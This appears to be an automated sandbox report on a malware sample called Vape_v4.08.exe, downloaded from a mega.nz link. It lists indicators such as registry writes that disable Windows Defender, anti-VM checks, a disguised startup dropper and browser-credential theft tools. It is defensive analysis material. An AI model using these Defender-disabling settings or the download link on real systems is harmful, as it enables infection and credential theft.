hxxps://mega[.]nz/file/w5QHiRza#KWghkl8Z4g96VlObyOrPS3OBWtWQJHoTJye_ku_qvds

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

Vape_v4.08.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Vape_v4.08.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Vape_v4.08.exe

NirSoft WebBrowserPassView 8 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zO825AA769\Kangaroo Patcher.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\7zO825AA769\Kangaroo Patcher.exe	WebBrowserPassView
behavioral1/memory/2304-144-0x0000000000820000-0x0000000000CBE000-memory.dmp	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	WebBrowserPassView
behavioral1/memory/1492-151-0x0000000000550000-0x00000000009CA000-memory.dmp	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	WebBrowserPassView
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	WebBrowserPassView

Nirsoft 16 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zO825AA769\Kangaroo Patcher.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\7zO825AA769\Kangaroo Patcher.exe	Nirsoft
behavioral1/memory/2304-144-0x0000000000820000-0x0000000000CBE000-memory.dmp	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe	Nirsoft
behavioral1/memory/1492-151-0x0000000000550000-0x00000000009CA000-memory.dmp	Nirsoft
C:\Users\Admin\AppData\Local\Temp\bfsvc.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\bfsvc.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\hh.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\hh.exe	Nirsoft
behavioral1/memory/1616-227-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral1/memory/4176-225-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
C:\Users\Admin\AppData\Local\Temp\xwizard.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\xwizard.exe	Nirsoft

Executes dropped EXE 9 IoCs

Processes:

Vape_v4.08.exeKangaroo Patcher.exeRtkBtManServ.exebfsvc.exesnuvcdsm.exewinhlp32.exesplwow64.exehh.exexwizard.exe

pid	process
4544	Vape_v4.08.exe
2304	Kangaroo Patcher.exe
1492	RtkBtManServ.exe
956	bfsvc.exe
1016	snuvcdsm.exe
4176	winhlp32.exe
1616	splwow64.exe
1472	hh.exe
1712	xwizard.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe	upx
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe	upx
C:\Users\Admin\AppData\Local\Temp\splwow64.exe	upx
C:\Users\Admin\AppData\Local\Temp\splwow64.exe	upx
behavioral1/memory/1616-227-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral1/memory/4176-225-0x0000000000400000-0x000000000045B000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Vape_v4.08.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Vape_v4.08.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Vape_v4.08.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeVape_v4.08.exeKangaroo Patcher.exeRtkBtManServ.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	Vape_v4.08.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	Kangaroo Patcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	RtkBtManServ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

Kangaroo Patcher.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager8806219.exe	Kangaroo Patcher.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager8806219.exe	Kangaroo Patcher.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zO8251D1B8\Vape_v4.08.exe	themida
C:\Users\Admin\AppData\Local\Temp\7zO8251D1B8\Vape_v4.08.exe	themida
behavioral1/memory/4544-136-0x00007FF6D79C0000-0x00007FF6D86AA000-memory.dmp	themida
behavioral1/memory/4544-138-0x00007FF6D79C0000-0x00007FF6D86AA000-memory.dmp	themida
behavioral1/memory/4544-140-0x00007FF6D79C0000-0x00007FF6D86AA000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Vape_v4.08.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Vape_v4.08.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

125 ipecho.net
126 ipecho.net
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Vape_v4.08.exe

pid process

4544 Vape_v4.08.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2192 4544 WerFault.exe Vape_v4.08.exe
3780 2304 WerFault.exe Kangaroo Patcher.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Vape_v4.08.exe

flow	ioc
125	ipecho.net
126	ipecho.net

pid	pid_target	process	target process
2192	4544	WerFault.exe	Vape_v4.08.exe
3780	2304	WerFault.exe	Kangaroo Patcher.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry class 3 IoCs

Processes:

chrome.exeKangaroo Patcher.exeRtkBtManServ.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	Kangaroo Patcher.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	RtkBtManServ.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeVape_v4.08.exe7zFM.exesnuvcdsm.exehh.exexwizard.exe

pid	process
3732	chrome.exe
3732	chrome.exe
1636	chrome.exe
1636	chrome.exe
1116	chrome.exe
1116	chrome.exe
4952	chrome.exe
4952	chrome.exe
492	chrome.exe
492	chrome.exe
2192	chrome.exe
2192	chrome.exe
4448	chrome.exe
4448	chrome.exe
4312	chrome.exe
4312	chrome.exe
4312	chrome.exe
4312	chrome.exe
4544	Vape_v4.08.exe
4544	Vape_v4.08.exe
4544	Vape_v4.08.exe
4544	Vape_v4.08.exe
1320	7zFM.exe
1320	7zFM.exe
1320	7zFM.exe
1320	7zFM.exe
1016	snuvcdsm.exe
1016	snuvcdsm.exe
1016	snuvcdsm.exe
1016	snuvcdsm.exe
1472	hh.exe
1472	hh.exe
1712	xwizard.exe
1712	xwizard.exe
1712	xwizard.exe
1712	xwizard.exe
1712	xwizard.exe
1712	xwizard.exe
1712	xwizard.exe
1712	xwizard.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid process

1320 7zFM.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

1636 chrome.exe
1636 chrome.exe
1636 chrome.exe

pid	process
1320	7zFM.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

7zFM.exeVape_v4.08.exeRtkBtManServ.exe

description	pid	process
Token: SeRestorePrivilege	1320	7zFM.exe
Token: 35	1320	7zFM.exe
Token: SeSecurityPrivilege	1320	7zFM.exe
Token: SeDebugPrivilege	4544	Vape_v4.08.exe
Token: SeSecurityPrivilege	1320	7zFM.exe
Token: SeDebugPrivilege	1492	RtkBtManServ.exe

Suspicious use of FindShellTrayWindow 37 IoCs

Processes:

chrome.exe7zFM.exe

pid	process
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1320	7zFM.exe
1320	7zFM.exe
1320	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe
1636	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1636 wrote to memory of 880	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 880	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 1972	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 3732	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 3732	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe
PID 1636 wrote to memory of 2224	1636	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://mega.nz/file/w5QHiRza#KWghkl8Z4g96VlObyOrPS3OBWtWQJHoTJye_ku_qvds
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff866254f50,0x7ff866254f60,0x7ff866254f70
2⤵
PID:880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1596 /prefetch:2
2⤵
PID:1972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1976 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 /prefetch:8
2⤵
PID:2224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2968 /prefetch:1
2⤵
PID:1432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2984 /prefetch:1
2⤵
PID:5020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:8
2⤵
PID:5040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4384 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5280 /prefetch:8
2⤵
PID:2496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4792 /prefetch:8
2⤵
PID:5032

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8
2⤵
PID:4920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4532 /prefetch:8
2⤵
PID:4068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4556 /prefetch:1
2⤵
PID:1660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5628 /prefetch:8
2⤵
PID:4312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5624 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2420 /prefetch:8
2⤵
PID:4484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5412 /prefetch:8
2⤵
PID:2416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3316 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4672 /prefetch:8
2⤵
PID:4272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3308 /prefetch:8
2⤵
PID:5116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2124 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2504 /prefetch:8
2⤵
PID:2872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1532,13523264521182557143,9370738723132881003,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3796 /prefetch:8
2⤵
PID:956

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3864

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4108

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Vape_v4.08.rar"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1320

C:\Users\Admin\AppData\Local\Temp\7zO8251D1B8\Vape_v4.08.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8251D1B8\Vape_v4.08.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
